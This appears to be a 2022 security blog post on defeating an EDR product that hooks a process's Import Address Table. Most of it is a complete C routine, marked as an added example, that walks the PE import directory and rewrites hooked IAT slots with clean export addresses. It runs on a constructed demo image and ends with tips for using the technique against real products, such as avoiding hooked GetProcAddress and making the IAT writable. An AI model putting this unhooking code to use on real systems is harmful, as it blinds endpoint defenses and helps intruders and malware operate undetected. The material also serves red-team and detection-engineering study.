EDR Bypass : How and Why to Unhook the Import Address Table
27 May 2022 at 09:33
One day, I was trying to bypass an EDR and I noticed something interesting.
The EDR I was trying to bypass wasn't hooking the exported functions of the loaded DLLs with an inline jmp instruction, the way other user-land EDRs do.
Instead, it was hooking the Import Address Table directly: the IAT slots of my process pointed at the EDR's code rather than at the real exports. That makes the usual moves useless, whether live-patching the hooked prologues or overwriting the loaded DLL's .text section with a fresh copy from disk, because the DLL itself was never modified.
I had to unhook the Import Address Table of my process.
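Added example, not the post's own code: a C walker over the PE import directory that compares each IAT slot with the address a trusted resolver returns for that import and rewrites the slots that differ. The structure layouts mirror winnt.h for PE32+, so the same unhook_iat would run over the base returned by GetModuleHandle(NULL) on Windows; here it runs over a constructed in-memory image with one DLL, two named imports and one hooked slot, and the resolver, the DLL name and every address in it are made up for the demo.

```c
// Added example: restore IAT slots that no longer point at the trusted export.
// Struct layouts mirror winnt.h (PE32+); the image and addresses are constructed.
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_DOS_SIGNATURE 0x5A4D   /* "MZ" */
#define IMAGE_NT_SIGNATURE  0x4550   /* "PE\0\0" */
#define PE64_MAGIC          0x20B
#define DIR_IMPORT          1
#define ORDINAL_FLAG64      (1ULL << 63)

typedef struct { uint16_t e_magic; uint8_t unused[58]; int32_t e_lfanew; } DosHeader;
typedef struct { uint32_t VirtualAddress; uint32_t Size; } DataDir;
typedef struct {
    uint32_t Signature;
    uint8_t  FileHeader[20];
    uint16_t Magic;            /* 0x20B for PE32+ */
    uint8_t  unused[110];      /* other optional-header fields, not needed here */
    DataDir  DataDirectory[16];
} NtHeaders64;
typedef struct {
    uint32_t OriginalFirstThunk;   /* RVA of the import name table (INT) */
    uint32_t TimeDateStamp, ForwarderChain;
    uint32_t Name;                 /* RVA of the DLL name */
    uint32_t FirstThunk;           /* RVA of the import address table (IAT) */
} ImportDescriptor;

/* Trusted address of dll!func, or 0 if unknown. On Windows this would read the
 * export table of the loaded module (or of a fresh copy mapped from disk). */
typedef uint64_t (*Resolver)(const char *dll, const char *func);

/* Returns the number of IAT slots rewritten, or -1 if base is not a PE32+ image.
 * On Windows the IAT pages are read-only: VirtualProtect them writable first. */
int unhook_iat(uint8_t *base, Resolver resolve) {
    const DosHeader *dos = (const DosHeader *)base;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return -1;
    const NtHeaders64 *nt = (const NtHeaders64 *)(base + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE || nt->Magic != PE64_MAGIC) return -1;
    DataDir imp = nt->DataDirectory[DIR_IMPORT];
    if (imp.VirtualAddress == 0) return 0;

    int restored = 0;
    for (const ImportDescriptor *d = (const ImportDescriptor *)(base + imp.VirtualAddress);
         d->Name != 0; d++) {
        if (d->OriginalFirstThunk == 0) continue;     /* no INT, names unavailable */
        const char *dll = (const char *)(base + d->Name);
        const uint64_t *names = (const uint64_t *)(base + d->OriginalFirstThunk);
        uint64_t *iat = (uint64_t *)(base + d->FirstThunk);
        for (; *names != 0; names++, iat++) {
            if (*names & ORDINAL_FLAG64) continue;    /* ordinal import: nothing to compare by name */
            /* IMAGE_IMPORT_BY_NAME: 2-byte Hint followed by the NUL-terminated name */
            const char *func = (const char *)(base + (*names & 0xFFFFFFFFu) + 2);
            uint64_t clean = resolve(dll, func);
            if (clean == 0 || *iat == clean) continue;
            printf("%s!%s: IAT holds %#llx, restoring %#llx\n", dll, func,
                   (unsigned long long)*iat, (unsigned long long)clean);
            *iat = clean;
            restored++;
        }
    }
    return restored;
}

/* --- Constructed image: one DLL, two named imports, the second one hooked --- */
#define CLEAN_NTALLOC   0x00007FFD12340100ULL   /* constructed "real" export addresses */
#define CLEAN_NTPROTECT 0x00007FFD12340200ULL
#define EDR_TRAMPOLINE  0x00007FFD99990000ULL   /* constructed hook target */

static uint64_t g_storage[512];                 /* 4 KiB, 8-byte aligned */

uint64_t sample_resolve(const char *dll, const char *func) {
    if (strcmp(dll, "ntdll.dll") != 0) return 0;
    if (strcmp(func, "NtAllocateVirtualMemory") == 0) return CLEAN_NTALLOC;
    if (strcmp(func, "NtProtectVirtualMemory") == 0) return CLEAN_NTPROTECT;
    return 0;
}

uint64_t *sample_iat(uint8_t *base) { return (uint64_t *)(base + 0x280); }

uint8_t *build_sample_image(void) {
    uint8_t *b = (uint8_t *)g_storage;
    memset(b, 0, sizeof g_storage);
    DosHeader *dos = (DosHeader *)b;
    dos->e_magic = IMAGE_DOS_SIGNATURE; dos->e_lfanew = 0x40;
    NtHeaders64 *nt = (NtHeaders64 *)(b + 0x40);
    nt->Signature = IMAGE_NT_SIGNATURE; nt->Magic = PE64_MAGIC;
    nt->DataDirectory[DIR_IMPORT].VirtualAddress = 0x200;
    nt->DataDirectory[DIR_IMPORT].Size = 2 * sizeof(ImportDescriptor);
    ImportDescriptor *d = (ImportDescriptor *)(b + 0x200);   /* zero terminator follows */
    d->OriginalFirstThunk = 0x240; d->Name = 0x300; d->FirstThunk = 0x280;
    strcpy((char *)b + 0x300, "ntdll.dll");
    strcpy((char *)b + 0x320 + 2, "NtAllocateVirtualMemory");  /* Hint = 0, then name */
    strcpy((char *)b + 0x340 + 2, "NtProtectVirtualMemory");
    uint64_t *names = (uint64_t *)(b + 0x240);
    names[0] = 0x320; names[1] = 0x340;         /* names[2] stays 0: end of list */
    uint64_t *iat = sample_iat(b);
    iat[0] = CLEAN_NTALLOC;
    iat[1] = EDR_TRAMPOLINE;                    /* the slot the "EDR" overwrote */
    return b;
}

int main(void) {
    uint8_t *img = build_sample_image();
    int n = unhook_iat(img, sample_resolve);
    printf("restored %d IAT slot(s)\n", n);
    return 0;
}
```

Two things decide whether this works against a real product. First, where the clean address comes from: a GetProcAddress that the EDR also hooks will hand back the trampoline, so resolve by walking the export table of the loaded module yourself, or of a copy mapped fresh from disk. Second, the IAT lives in read-only pages after the loader is done, so the rewrite needs a VirtualProtect round-trip, and that call is itself a classic hook point.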